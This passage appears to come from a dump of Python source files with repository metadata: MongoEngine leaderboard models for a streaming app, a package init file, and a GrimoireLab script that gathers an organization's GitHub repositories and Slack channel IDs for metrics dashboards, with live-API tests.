    charm = IntField(verbose_name=u"主播近三天魅力值")  # charm earned over the last 3 days
    change_status = IntField(verbose_name=u"较上次位置变化情况")  # movement vs. previous ranking
    type = IntField(verbose_name=u"榜单类型")  # leaderboard type: 1 = weekly, 2 = daily
    rank = IntField(verbose_name=u"当前排名", default=0)  # current position (0 = unranked)

    @classmethod
    def get_rank_list(cls, count, type):
        """Return entries of leaderboard ``type`` (1 = weekly, 2 = daily)
        ranked at or above ``count``.

        First parameter renamed ``self`` -> ``cls`` (this is a classmethod).
        """
        return cls.objects.filter(rank__lte=count, type=int(type))
class WealthRankNew(Document):
    """Wealth leaderboard entry (newer variant supporting weekly/daily boards)."""

    # (code, label) choices for ``change_status``: 0 = unchanged, 1 = up, 2 = down.
    CHANGE = [
        (0, u"不变"),
        (1, u"上升"),
        (2, u"下降"),
    ]

    user = GenericReferenceField("User", verbose_name=u'用户')  # ranked user
    wealth = IntField(verbose_name=u"用户近三天财富值")  # wealth accumulated over the last 3 days
    change_status = IntField(verbose_name=u"较上次位置变化情况")  # movement vs. previous ranking
    rank = IntField(verbose_name=u"当前排名")  # current position
    type = IntField(verbose_name=u"榜单类型")  # leaderboard type: 1 = weekly, 2 = daily

    @classmethod
    def get_rank_list(cls, count, type):
        """Return entries of leaderboard ``type`` (1 = weekly, 2 = daily)
        ranked at or above ``count``.

        First parameter renamed ``self`` -> ``cls`` (this is a classmethod).
        """
        return cls.objects.filter(rank__lte=count, type=int(type))
# Charm leaderboard for "pure/innocent"-category anchors
class PureCharmRank(Document):
    """Charm leaderboard entry for "pure/innocent"-category anchors."""

    user = GenericReferenceField("User", verbose_name=u'用户')  # ranked user
    charm = IntField(verbose_name=u"主播近三天魅力值")  # charm earned over the last 3 days
    change_status = IntField(verbose_name=u"较上次位置变化情况")  # movement vs. previous ranking
    type = IntField(verbose_name=u"榜单类型")  # leaderboard type: 1 = weekly, 2 = daily
    rank = IntField(verbose_name=u"当前排名", default=0)  # current position (0 = unranked)

    @classmethod
    def get_rank_list(cls):
        """Return every entry of this leaderboard."""
        # Query via ``cls`` for consistency with the sibling rank models.
        return cls.objects.all()
| 23.803797 | 88 | 0.659133 | 478 | 3,761 | 4.997908 | 0.182008 | 0.170364 | 0.185852 | 0.234408 | 0.783591 | 0.768522 | 0.74257 | 0.74257 | 0.694851 | 0.65969 | 0 | 0.012851 | 0.213773 | 3,761 | 157 | 89 | 23.955414 | 0.795063 | 0.035895 | 0 | 0.747368 | 0 | 0 | 0.064344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073684 | false | 0 | 0.031579 | 0.021053 | 0.705263 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
bb0310c2f2ffb782b05bc1aa7afea00b914c1bd6 | 37 | py | Python | app/app/__init__.py | bcgov/nr-site | 0582426f71db9a8f0b0d95fd9ac3ee295f9757fc | [
"Apache-2.0"
] | null | null | null | app/app/__init__.py | bcgov/nr-site | 0582426f71db9a8f0b0d95fd9ac3ee295f9757fc | [
"Apache-2.0"
] | 4 | 2022-02-05T00:44:56.000Z | 2022-02-26T23:54:17.000Z | app/app/__init__.py | bcgov/nr-site | 0582426f71db9a8f0b0d95fd9ac3ee295f9757fc | [
"Apache-2.0"
] | 1 | 2021-11-16T19:28:25.000Z | 2021-11-16T19:28:25.000Z | import app.models
import app.schemas
| 12.333333 | 18 | 0.837838 | 6 | 37 | 5.166667 | 0.666667 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 2 | 19 | 18.5 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
249cb6c6e0328fe2d255b36cf450971de088aa02 | 26,581 | py | Python | get_projects.py | open-craft/metrics-dashboard | a8ef79b5bd98c601a9171b2eeb6fe549a062b2e1 | [
"Apache-2.0"
] | 2 | 2019-06-11T03:14:34.000Z | 2019-12-12T23:34:28.000Z | get_projects.py | open-craft/metrics-dashboard | a8ef79b5bd98c601a9171b2eeb6fe549a062b2e1 | [
"Apache-2.0"
] | 7 | 2021-01-28T16:54:37.000Z | 2021-10-15T19:17:52.000Z | get_projects.py | open-craft/metrics-dashboard | a8ef79b5bd98c601a9171b2eeb6fe549a062b2e1 | [
"Apache-2.0"
] | 1 | 2021-07-21T08:28:47.000Z | 2021-07-21T08:28:47.000Z | """
Gets all of the repos/channels for a grimoirelabs project
"""
import os
import github3
import json
from slack import WebClient
def create_projects(projects, config):
    """Fill in the repo/channel lists for each project in ``projects``.

    For every project:
      * ``git`` entries that are GitHub organization names (not URLs) are
        expanded into the org's public repository URLs, mirrored into the
        ``github`` and ``github:repo`` keys;
      * an empty ``slack`` list is replaced by all non-archived channel ids;
      * an empty ``discourse`` list defaults to the Open edX forum.

    Mutates ``projects`` in place and also returns it.

    :param projects: mapping of project name -> data-source dict.
    :param config: mapping with ``github``/``slack`` sections, each holding an
        ``api-token`` entry.
    """
    git_token = config['github']['api-token']
    slack_token = config['slack']['api-token']
    for key in projects:
        project = projects[key]
        # Expand only when the entries are org names.  The old check,
        # ``'http' not in projects[key]['git']``, tested list *membership*
        # (element equality), so lists of repo URLs were wrongly expanded
        # as organization names.
        if 'git' in project and not any(entry.startswith('http') for entry in project['git']):
            git_repos = []
            for organization in project['git']:
                git_repos.extend(get_git_repos(organization, git_token))
            project['git'] = git_repos
            project['github'] = git_repos
            project['github:repo'] = git_repos
        if 'slack' in project and project['slack'] == []:
            project['slack'] = get_slack_channels(slack_token)
        if 'discourse' in project and project['discourse'] == []:
            project['discourse'] = ["https://discuss.openedx.org"]
    return projects
def get_git_repos(org, token):
    """Return the HTML URLs of *org*'s public, non-fork GitHub repositories."""
    session = github3.login(token=token)
    public_repos = session.organization(org).repositories('public')
    return [repo.html_url for repo in public_repos if not repo.fork]
def get_slack_channels(token):
    """Return the ids of every non-archived channel in the Slack workspace."""
    response = WebClient(token=token).conversations_list(exclude_archived=True)
    return [channel['id'] for channel in response['channels']]
if __name__ == '__main__':
    '''
    Test 1: Tests automatically filling the values for the
    project for both a github organization and a slack workspace.
    Passes when length of projects for slack is equivalent to number of
    channels and length of projects for github is equivalent to the
    number of public repos for a github organization.
    '''
    projects1 = {
        "Open edX": {
            "git": ["edx"],
            "github": [],
            # NOTE(review): the other tests use the key "github:repos" —
            # confirm which spelling create_projects actually reads.
            "github:repo": [],
            "slack": [],
            "discourse": []
        }
    }
    # API tokens come from the environment (KeyError if unset) so credentials
    # never live in the source; the tests hit the live services.
    config1 = {
        'github': {'api-token': os.environ['GITHUB_KEY']},
        'slack': {'api-token': os.environ['SLACK_KEY']},
        'discourse': {'api-token': os.environ['DISCOURSE_KEY']}
    }
    create_projects(projects1, config1)
    # 154 channels / 224 repos were the live totals when the test was written;
    # these counts will drift as the workspace and organization change.
    if len(projects1['Open edX']['slack']) == 154 and len(projects1['Open edX']['github']) == 224:
        print('Test 1 Passed: Filling in projects for Git and Slack')
    else:
        print('Test 1 failed:\n Length of github: %d\n Length of slack: %d'
              % (len(projects1['Open edX']['github']),
                 len(projects1['Open edX']['slack'])))
    '''
    Test 2: Tests automatically filling the values for the
    project for only a slack workspace.
    Passes when length of projects for slack is equivalent to number of
    channels and length of projects for github is equivalent to the
    specified projects.
    '''
    projects2 = {
        "Open edX": {
            "git": ['https://github.com/edx/publisher-frontend'],
            "github": ['https://github.com/edx/publisher-frontend'],
            "github:repos": ['https://github.com/edx/publisher-frontend'],
            "slack": []
        }
    }
    create_projects(projects2, config1)
    if len(projects2['Open edX']['slack']) == 154 and len(projects2['Open edX']['github']) == 1:
        print('Test 2 Passed: Filling in projects for only Slack')
    else:
        # Fixed: this branch used to be a bare string literal (a no-op) whose
        # commented-out print both concatenated str + int (TypeError) and
        # reported projects1 instead of projects2.
        print('Test 2 failed:\n Length of slack: %d\n Length of github: %d'
              % (len(projects2['Open edX']['slack']),
                 len(projects2['Open edX']['github'])))
    '''
    Test 3: Tests that this fills in values for multiple projects within the same
    dictionary.
    Passes if length for each part (i.e. github, slack) of each project is
    correct (i.e. equal to the number of channels, number of public repositories,
    number of specified repos, number of specified channels).
    '''
    projects3 = {
        "Open edX": {
            "git": ['https://github.com/edx/publisher-frontend'],
            "github": ['https://github.com/edx/publisher-frontend'],
            "github:repos": ['https://github.com/edx/publisher-frontend'],
            "slack": []
        },
        "Test": {
            "git": ['openedx'],
            "github": [],
            "github:repos": [],
            "slack": ['test']
        }
    }
    create_projects(projects3, config1)
    if (len(projects3['Open edX']['slack']) == 154 and
            len(projects3['Open edX']['github']) == 1 and
            len(projects3['Test']['slack']) == 1 and
            len(projects3['Test']['github']) == 3):
        print('Test 3 Passed: Testing multiple projects')
    else:
        # Fixed: a failing Test 3 previously produced no output at all.
        print('Test 3 failed:\n Open edX slack: %d github: %d\n Test slack: %d github: %d'
              % (len(projects3['Open edX']['slack']),
                 len(projects3['Open edX']['github']),
                 len(projects3['Test']['slack']),
                 len(projects3['Test']['github'])))
    '''
    Test 4: Tests with our data
    '''
projects4 = {"Open edX": {"git": ["https://github.com/edx/cs_comments_service", "https://github.com/edx/xqueue", "https://github.com/edx/django-wiki", "https://github.com/edx/ease", "https://github.com/edx/edx-ora", "https://github.com/edx/loghandlersplus", "https://github.com/edx/XBlock", "https://github.com/edx/djeventstream", "https://github.com/edx/insights", "https://github.com/edx/edxanalytics", "https://github.com/edx/archived-edx.github.io", "https://github.com/edx/configuration", "https://github.com/edx/codejail", "https://github.com/edx/arch-prototype", "https://github.com/edx/skel", "https://github.com/edx/edx-platform", "https://github.com/edx/xserver", "https://github.com/edx/edx-tools", "https://github.com/edx/js-test-tool", "https://github.com/edx/notifier", "https://github.com/edx/event-tracking", "https://github.com/edx/git-client-plugin", "https://github.com/edx/edx-demo-course", "https://github.com/edx/patch-juggler", "https://github.com/edx/repo-tools", "https://github.com/edx/git-plugin", "https://github.com/edx/edx-e2e-tests", "https://github.com/edx/bok-choy", "https://github.com/edx/asgard", "https://github.com/edx/datajam", "https://github.com/edx/datajam-analytics", "https://github.com/edx/edx-ora2", "https://github.com/edx/test-metrics", "https://github.com/edx/acid-block", "https://github.com/edx/xblock-sdk", "https://github.com/edx/edx-certificates", "https://github.com/edx/xqueue-watcher", "https://github.com/edx/dogapi", "https://github.com/edx/alton", "https://github.com/edx/opaque-keys", "https://github.com/edx/edx-analytics-data-api", "https://github.com/edx/i18n-tools", "https://github.com/edx/edx-submissions", "https://github.com/edx/edx-analytics-dashboard", "https://github.com/edx/django-oauth2-provider", "https://github.com/edx/edx-val", "https://github.com/edx/openedx-webhooks", "https://github.com/edx/edx-analytics-configuration", "https://github.com/edx/edx-analytics-data-api-client", 
"https://github.com/edx/edx-analytics-pipeline", "https://github.com/edx/edx-oauth2-provider", "https://github.com/edx/django-lang-pref-middleware", "https://github.com/edx/edx-documentation", "https://github.com/edx/luigi", "https://github.com/edx/xblock-utils", "https://github.com/edx/edx-fonts", "https://github.com/edx/edx-analytics-api-client", "https://github.com/edx/harprofiler", "https://github.com/edx/MongoDBProxy", "https://github.com/edx/edx-notes-api", "https://github.com/edx/edx-analytics-hadoop-util", "https://github.com/edx/edx-milestones", "https://github.com/edx/edx-django-profiler", "https://github.com/edx/edx-notifications", "https://github.com/edx/edx-app-ios", "https://github.com/edx/edx-app-android", "https://github.com/edx/edx-search", "https://github.com/edx/ux-pattern-library", "https://github.com/edx/pyinstrument", "https://github.com/edx/edx-lint", "https://github.com/edx/ecommerce", "https://github.com/edx/auth-backends", "https://github.com/edx/edx-app-gradle-plugin", "https://github.com/edx/testeng-ci", "https://github.com/edx/edx-reverification-block", "https://github.com/edx/edx-rest-api-client", "https://github.com/edx/thumb-stack", "https://github.com/edx/edx-common-client", "https://github.com/edx/edx-proctoring", "https://github.com/edx/edx-user-state-client", "https://github.com/edx/ecommerce-scripts", "https://github.com/edx/edx-organizations", "https://github.com/edx/ccx-keys", "https://github.com/edx/discussions", "https://github.com/edx/edx-load-tests", "https://github.com/edx/xsy", "https://github.com/edx/edx-ui-toolkit", "https://github.com/edx/openedx-conference-pages", "https://github.com/edx/django-rest-framework-oauth", "https://github.com/edx/cookiecutter-django-ida", "https://github.com/edx/programs", "https://github.com/edx/demo-performance-course", "https://github.com/edx/ecommerce-worker", "https://github.com/edx/django-openid-auth", "https://github.com/edx/django-pyfs", 
"https://github.com/edx/django-rest-framework", "https://github.com/edx/demo-test-course", "https://github.com/edx/build-pipeline", "https://github.com/edx/edx-custom-a11y-rules", "https://github.com/edx/django-splash", "https://github.com/edx/edx-analytics-exporter", "https://github.com/edx/xblock-lti-consumer", "https://github.com/edx/course-discovery", "https://github.com/edx/credentials", "https://github.com/edx/edx-django-extensions", "https://github.com/edx/edx-grader-support", "https://github.com/edx/tubular", "https://github.com/edx/dummy-webapp", "https://github.com/edx/edx-capa", "https://github.com/edx/edx-django-release-util", "https://github.com/edx/edx-drf-extensions", "https://github.com/edx/edx-django-sites-extensions", "https://github.com/edx/pa11ycrawler", "https://github.com/edx/open-edx-proposals", "https://github.com/edx/edx-icon", "https://github.com/edx/api-manager", "https://github.com/edx/sample-themes", "https://github.com/edx/jenkins-job-dsl", "https://github.com/edx/openedxstats", "https://github.com/edx/gomatic", "https://github.com/edx/edx-safety", "https://github.com/edx/edx-gomatic", "https://github.com/edx/eslint-config-edx", "https://github.com/edx/cookiecutter-django-app", "https://github.com/edx/vagrant-timer", "https://github.com/edx/edx-app-android-white-label-demo", "https://github.com/edx/cookiecutter-xblock", "https://github.com/edx/django-user-tasks", "https://github.com/edx/notifications", "https://github.com/edx/notifications-pipeline-steps", "https://github.com/edx/edx-sphinx-theme", "https://github.com/edx/django-config-models", "https://github.com/edx/edx-enterprise", "https://github.com/edx/web-fragments", "https://github.com/edx/devstack", "https://github.com/edx/pa11ycrawler-ignore", "https://github.com/edx/edx-celeryutils", "https://github.com/edx/edx-salesforce", "https://github.com/edx/credentials-themes", "https://github.com/edx/help-tokens", "https://github.com/edx/paragon", 
"https://github.com/edx/language-negotiation-lambda", "https://github.com/edx/edx-docker-base", "https://github.com/edx/jenkins-configuration", "https://github.com/edx/py-opt-cli", "https://github.com/edx/supported-components", "https://github.com/edx/bootstrapped", "https://github.com/edx/edx-bootstrap", "https://github.com/edx/edx-video-pipeline", "https://github.com/edx/edx-video-worker", "https://github.com/edx/ConceptXBlock", "https://github.com/edx/AudioXBlock", "https://github.com/edx/RecommenderXBlock", "https://github.com/edx/AnimationXBlock", "https://github.com/edx/RateXBlock", "https://github.com/edx/DoneXBlock", "https://github.com/edx/django-celery", "https://github.com/edx/edx-ace", "https://github.com/edx/studio-frontend", "https://github.com/edx/stylelint-config-edx", "https://github.com/edx/xblock-review", "https://github.com/edx/django-oauth-plus", "https://github.com/edx/edx-enterprise-data", "https://github.com/edx/analytics-python", "https://github.com/edx/edx-app-test", "https://github.com/edx/edx-app-qa", "https://github.com/edx/completion", "https://github.com/edx/openedx-census", "https://github.com/edx/frontend-cookie-cutter-application", "https://github.com/edx/journals", "https://github.com/edx/user-util", "https://github.com/edx/XSS-Linter", "https://github.com/edx/cookie-policy-banner", "https://github.com/edx/xapi-events", "https://github.com/edx/create-edx-react-app", "https://github.com/edx/docs.edx.org", "https://github.com/edx/chunkey", "https://github.com/edx/v_videocompile", "https://github.com/edx/edx-portal", "https://github.com/edx/cookie-cutter-react-component-library", "https://github.com/edx/floor-plan-connector", "https://github.com/edx/journals-frontend", "https://github.com/edx/django-plugins", "https://github.com/edx/edx-toggles", "https://github.com/edx/TinCanPython", "https://github.com/edx/edx-django-utils", "https://github.com/edx/frontend-cookiecutter-library", "https://github.com/edx/vertica_docker", 
"https://github.com/edx/xss-utils", "https://github.com/edx/frontend-auth", "https://github.com/edx/edx-developer-docs", "https://github.com/edx/gradebook", "https://github.com/edx/mockprock", "https://github.com/edx/code-annotations", "https://github.com/edx/cypress-e2e-tests", "https://github.com/edx/publisher-frontend", "https://github.com/edx/mdrst", "https://github.com/edx/frontend-component-footer", "https://github.com/edx/frontend-component-site-header", "https://github.com/edx/frontend-app-profile", "https://github.com/edx/hermes", "https://github.com/edx/registrar", "https://github.com/edx/asym-crypto-yaml", "https://github.com/edx/edx-rbac", "https://github.com/edx/edx-when", "https://github.com/edx/crowdsourcehinter", "https://github.com/edx/html-webpack-new-relic-plugin", "https://github.com/edx/frontend-app-learner-portal", "https://github.com/edx/frontend-analytics", "https://github.com/edx/frontend-logging", "https://github.com/edx/frontend-app-ecommerce", "https://github.com/edx/openedx-calc", "https://github.com/edx/frontend-app-account", "https://github.com/edx/frontend-common", "https://github.com/edx/edx-zoom", "https://github.com/edx/portal-designer", "https://github.com/edx/frontend-app-payment", "https://github.com/edx/openedx-chem", "https://github.com/edx/frontend-i18n", "https://github.com/edx/staff_graded-xblock", "https://github.com/edx/super-csv", "https://github.com/edx/frontend-app-program-manager", "https://github.com/edx/edx-bulk-grades", "https://github.com/edx/edx4edx_lite"], "github": ["https://github.com/edx/cs_comments_service", "https://github.com/edx/xqueue", "https://github.com/edx/django-wiki", "https://github.com/edx/ease", "https://github.com/edx/edx-ora", "https://github.com/edx/loghandlersplus", "https://github.com/edx/XBlock", "https://github.com/edx/djeventstream", "https://github.com/edx/insights", "https://github.com/edx/edxanalytics", "https://github.com/edx/archived-edx.github.io", 
"https://github.com/edx/configuration", "https://github.com/edx/codejail", "https://github.com/edx/arch-prototype", "https://github.com/edx/skel", "https://github.com/edx/edx-platform", "https://github.com/edx/xserver", "https://github.com/edx/edx-tools", "https://github.com/edx/js-test-tool", "https://github.com/edx/notifier", "https://github.com/edx/event-tracking", "https://github.com/edx/git-client-plugin", "https://github.com/edx/edx-demo-course", "https://github.com/edx/patch-juggler", "https://github.com/edx/repo-tools", "https://github.com/edx/git-plugin", "https://github.com/edx/edx-e2e-tests", "https://github.com/edx/bok-choy", "https://github.com/edx/asgard", "https://github.com/edx/datajam", "https://github.com/edx/datajam-analytics", "https://github.com/edx/edx-ora2", "https://github.com/edx/test-metrics", "https://github.com/edx/acid-block", "https://github.com/edx/xblock-sdk", "https://github.com/edx/edx-certificates", "https://github.com/edx/xqueue-watcher", "https://github.com/edx/dogapi", "https://github.com/edx/alton", "https://github.com/edx/opaque-keys", "https://github.com/edx/edx-analytics-data-api", "https://github.com/edx/i18n-tools", "https://github.com/edx/edx-submissions", "https://github.com/edx/edx-analytics-dashboard", "https://github.com/edx/django-oauth2-provider", "https://github.com/edx/edx-val", "https://github.com/edx/openedx-webhooks", "https://github.com/edx/edx-analytics-configuration", "https://github.com/edx/edx-analytics-data-api-client", "https://github.com/edx/edx-analytics-pipeline", "https://github.com/edx/edx-oauth2-provider", "https://github.com/edx/django-lang-pref-middleware", "https://github.com/edx/edx-documentation", "https://github.com/edx/luigi", "https://github.com/edx/xblock-utils", "https://github.com/edx/edx-fonts", "https://github.com/edx/edx-analytics-api-client", "https://github.com/edx/harprofiler", "https://github.com/edx/MongoDBProxy", "https://github.com/edx/edx-notes-api", 
"https://github.com/edx/edx-analytics-hadoop-util", "https://github.com/edx/edx-milestones", "https://github.com/edx/edx-django-profiler", "https://github.com/edx/edx-notifications", "https://github.com/edx/edx-app-ios", "https://github.com/edx/edx-app-android", "https://github.com/edx/edx-search", "https://github.com/edx/ux-pattern-library", "https://github.com/edx/pyinstrument", "https://github.com/edx/edx-lint", "https://github.com/edx/ecommerce", "https://github.com/edx/auth-backends", "https://github.com/edx/edx-app-gradle-plugin", "https://github.com/edx/testeng-ci", "https://github.com/edx/edx-reverification-block", "https://github.com/edx/edx-rest-api-client", "https://github.com/edx/thumb-stack", "https://github.com/edx/edx-common-client", "https://github.com/edx/edx-proctoring", "https://github.com/edx/edx-user-state-client", "https://github.com/edx/ecommerce-scripts", "https://github.com/edx/edx-organizations", "https://github.com/edx/ccx-keys", "https://github.com/edx/discussions", "https://github.com/edx/edx-load-tests", "https://github.com/edx/xsy", "https://github.com/edx/edx-ui-toolkit", "https://github.com/edx/openedx-conference-pages", "https://github.com/edx/django-rest-framework-oauth", "https://github.com/edx/cookiecutter-django-ida", "https://github.com/edx/programs", "https://github.com/edx/demo-performance-course", "https://github.com/edx/ecommerce-worker", "https://github.com/edx/django-openid-auth", "https://github.com/edx/django-pyfs", "https://github.com/edx/django-rest-framework", "https://github.com/edx/demo-test-course", "https://github.com/edx/build-pipeline", "https://github.com/edx/edx-custom-a11y-rules", "https://github.com/edx/django-splash", "https://github.com/edx/edx-analytics-exporter", "https://github.com/edx/xblock-lti-consumer", "https://github.com/edx/course-discovery", "https://github.com/edx/credentials", "https://github.com/edx/edx-django-extensions", "https://github.com/edx/edx-grader-support", 
"https://github.com/edx/tubular", "https://github.com/edx/dummy-webapp", "https://github.com/edx/edx-capa", "https://github.com/edx/edx-django-release-util", "https://github.com/edx/edx-drf-extensions", "https://github.com/edx/edx-django-sites-extensions", "https://github.com/edx/pa11ycrawler", "https://github.com/edx/open-edx-proposals", "https://github.com/edx/edx-icon", "https://github.com/edx/api-manager", "https://github.com/edx/sample-themes", "https://github.com/edx/jenkins-job-dsl", "https://github.com/edx/openedxstats", "https://github.com/edx/gomatic", "https://github.com/edx/edx-safety", "https://github.com/edx/edx-gomatic", "https://github.com/edx/eslint-config-edx", "https://github.com/edx/cookiecutter-django-app", "https://github.com/edx/vagrant-timer", "https://github.com/edx/edx-app-android-white-label-demo", "https://github.com/edx/cookiecutter-xblock", "https://github.com/edx/django-user-tasks", "https://github.com/edx/notifications", "https://github.com/edx/notifications-pipeline-steps", "https://github.com/edx/edx-sphinx-theme", "https://github.com/edx/django-config-models", "https://github.com/edx/edx-enterprise", "https://github.com/edx/web-fragments", "https://github.com/edx/devstack", "https://github.com/edx/pa11ycrawler-ignore", "https://github.com/edx/edx-celeryutils", "https://github.com/edx/edx-salesforce", "https://github.com/edx/credentials-themes", "https://github.com/edx/help-tokens", "https://github.com/edx/paragon", "https://github.com/edx/language-negotiation-lambda", "https://github.com/edx/edx-docker-base", "https://github.com/edx/jenkins-configuration", "https://github.com/edx/py-opt-cli", "https://github.com/edx/supported-components", "https://github.com/edx/bootstrapped", "https://github.com/edx/edx-bootstrap", "https://github.com/edx/edx-video-pipeline", "https://github.com/edx/edx-video-worker", "https://github.com/edx/ConceptXBlock", "https://github.com/edx/AudioXBlock", "https://github.com/edx/RecommenderXBlock", 
"https://github.com/edx/AnimationXBlock", "https://github.com/edx/RateXBlock", "https://github.com/edx/DoneXBlock", "https://github.com/edx/django-celery", "https://github.com/edx/edx-ace", "https://github.com/edx/studio-frontend", "https://github.com/edx/stylelint-config-edx", "https://github.com/edx/xblock-review", "https://github.com/edx/django-oauth-plus", "https://github.com/edx/edx-enterprise-data", "https://github.com/edx/analytics-python", "https://github.com/edx/edx-app-test", "https://github.com/edx/edx-app-qa", "https://github.com/edx/completion", "https://github.com/edx/openedx-census", "https://github.com/edx/frontend-cookie-cutter-application", "https://github.com/edx/journals", "https://github.com/edx/user-util", "https://github.com/edx/XSS-Linter", "https://github.com/edx/cookie-policy-banner", "https://github.com/edx/xapi-events", "https://github.com/edx/create-edx-react-app", "https://github.com/edx/docs.edx.org", "https://github.com/edx/chunkey", "https://github.com/edx/v_videocompile", "https://github.com/edx/edx-portal", "https://github.com/edx/cookie-cutter-react-component-library", "https://github.com/edx/floor-plan-connector", "https://github.com/edx/journals-frontend", "https://github.com/edx/django-plugins", "https://github.com/edx/edx-toggles", "https://github.com/edx/TinCanPython", "https://github.com/edx/edx-django-utils", "https://github.com/edx/frontend-cookiecutter-library", "https://github.com/edx/vertica_docker", "https://github.com/edx/xss-utils", "https://github.com/edx/frontend-auth", "https://github.com/edx/edx-developer-docs", "https://github.com/edx/gradebook", "https://github.com/edx/mockprock", "https://github.com/edx/code-annotations", "https://github.com/edx/cypress-e2e-tests", "https://github.com/edx/publisher-frontend", "https://github.com/edx/mdrst", "https://github.com/edx/frontend-component-footer", "https://github.com/edx/frontend-component-site-header", "https://github.com/edx/frontend-app-profile", 
"https://github.com/edx/hermes", "https://github.com/edx/registrar", "https://github.com/edx/asym-crypto-yaml", "https://github.com/edx/edx-rbac", "https://github.com/edx/edx-when", "https://github.com/edx/crowdsourcehinter", "https://github.com/edx/html-webpack-new-relic-plugin", "https://github.com/edx/frontend-app-learner-portal", "https://github.com/edx/frontend-analytics", "https://github.com/edx/frontend-logging", "https://github.com/edx/frontend-app-ecommerce", "https://github.com/edx/openedx-calc", "https://github.com/edx/frontend-app-account", "https://github.com/edx/frontend-common", "https://github.com/edx/edx-zoom", "https://github.com/edx/portal-designer", "https://github.com/edx/frontend-app-payment", "https://github.com/edx/openedx-chem", "https://github.com/edx/frontend-i18n", "https://github.com/edx/staff_graded-xblock", "https://github.com/edx/super-csv", "https://github.com/edx/frontend-app-program-manager", "https://github.com/edx/edx-bulk-grades", "https://github.com/edx/edx4edx_lite"], "slack": ["CE73RNA1J", "C18DN7JDR", "C1KMGGK7B", "CBJG9K5AB", "C1GV2QCTX", "C18CP8CFQ", "C0F4KLB5Z", "C9HL8MXRU", "CHYH0BDTR", "C321C5NVB", "C0RU5BTCP", "CDLBJS6FL", "CHJV96WS3", "C7U57FJ6M", "CFKQ54XD4", "C0NKZ5NQJ", "C5HEQHD6Y", "C0P4X6SQM", "C2X8RTMAR", "CK94QNCQ0", "CE3QFEETH", "CH95Z37A5", "C8VNEGK8S", "C0F584CH0", "CDH6K8ZK3", "C4913NQCE", "C116PL2SW", "C502JJBLN", "C0HN8M50D", "C0RE99TT4", "C0F22D6D7", "C1JL4UGVA", "C2YCNUJHG", "C1H96824B", "C13NSPFSP", "C1H7GU8VD", "C12M8M5AR", "CAXGT1PDJ", "C0MGYSC6A", "CHEU1FJ4V", "CDAG4KN2C", "CH37FF4AW", "CD93YLU9M", "C0EFVC6RK", "C1LM7G955", "C114ZRBPV", "C0WL6SPRA", "CBBLN5Q92", "CHFETNX88", "CCY2WTBK7", "C4RGQL82C", "C5EFG44P5", "C0HNBT5FT", "C9K3K46CR", "C1EDFL21M", "C5FRNT74L", "C4EAVJNNQ", "C67SNSHJB", "C0F0AD1HT", "C0YPSP0P5", "CD0H6H8P5", "CBL2US2G7", "CB1APK5D5", "CHJ7GA013", "C1K0A7BFD", "C0EUBSV7D", "C1HKV3BHV", "CA0DFM0FP", "C02SNA1U4", "C02SNEPU6", "CGSFKNDMW", "C1HF0SBA7", "C1HJ07C68", "C1HHWC8S0", 
"C2M6V63EV", "C2L5U7J5N", "C0PFZVB0E", "C1GS0DT7F", "CFS88FU59", "C0PG1BEAU", "C0PFYU9EV", "C0PFT4EG3", "C0PG0L40H", "C1HK3B5DY", "C0PFW2WKZ", "C0PG4D5GQ", "C1HF93HNX", "C3CBY0LBE", "C0PFZTVJN", "C3C7QUYLB", "C794AG9HP", "C1HHU62KW", "C91M88HD3", "CA9BS81T7", "CE90JM6SE", "CHFEUACKS", "C1KHYD4LT", "CFSA1T268", "CGEHJQK17", "C1N0RH6LD", "CHW5JSV9P", "C8SN0NWAC", "CA183QY2Y", "CGRU5KU6A", "CHSK2T70S", "C118NHV16", "C0DQBGEN4", "CFYRF14BZ", "C36B28HE0", "C1UEPR1FF", "C469C1QJZ", "CB29ZP7NJ", "C0F0FQS7R", "CB05HAGS2", "C4C6A836U", "C1QLT1H6D", "C70EXHW01", "C0GR05YC9", "CEJKH4VBK", "C0HRHFQ49", "C02SNEYAJ", "C5JKQTKAA", "C8VN7RGRF", "C0F0NA2F5", "C5HTRMS0J", "C1YNP01MJ", "CAY3F0BPD", "C02SNDNPC", "C2Q6MDF34", "C0F2FLRQU", "C26T5JFDX", "C0HDQ1A5P", "C0RKFAQEA", "C0X181LQ1", "C109EQPM1", "C1L370YTZ", "C20D9NWCT", "C0F63UDL0", "CH9SC5PRT", "CE6LE8WD7", "CHFCRQYDV", "CF5PSNV8S", "CJW040YMT", "C1DUYU95L", "C1HKGGL1J", "C1EH2UU07", "C586BMF5H", "C57P43CSV", "C5JFGF7FC", "C5JDBQMHS", "CAFM1HU3C", "CEJF3H52L", "CH974URD5", "C02SM402H", "C08B4LZEZ", "CELRNJ84E", "C4BTM66AW", "C26BW6LJF", "CJF1K4WKF", "CFPD5ECUB", "C0S120CBG", "C6DCAACSW", "CC4GBRA4X", "C116PL3LJ", "CD506K945", "CDB7T9K6E", "C1H7FTCTZ", "C02SUL70H", "C48CG81N0", "C0WKV86TH", "C02SNA1UC", "C0PG3FUE7", "C1X358B3K", "CCUR8HM62", "CDCCM2X7Z", "C0Q4B9YKS", "C52M3RZK2", "C1LE356SY", "CGB0S3L12", "C4YS3MLE4", "C0DQ7GA6P", "CAZ7N2SSX", "C0H4U6TFS", "C0G15M90X", "C9PPC2BHP", "CGE253B7V", "CH8LJ4ESG", "C1JRTS7T4", "C1P9TFUE7", "C1JQR69L6", "C1PB8HBFS", "C1P4K0685", "CCBJURJKY", "C1HJ0BT25", "C0GF6FTHA"]}}
    # Test 4: run against the fully pre-populated Open edX dataset defined in
    # projects4 above; the pass message ("Not filling data") indicates the
    # already-filled lists are expected to come back at the same lengths.
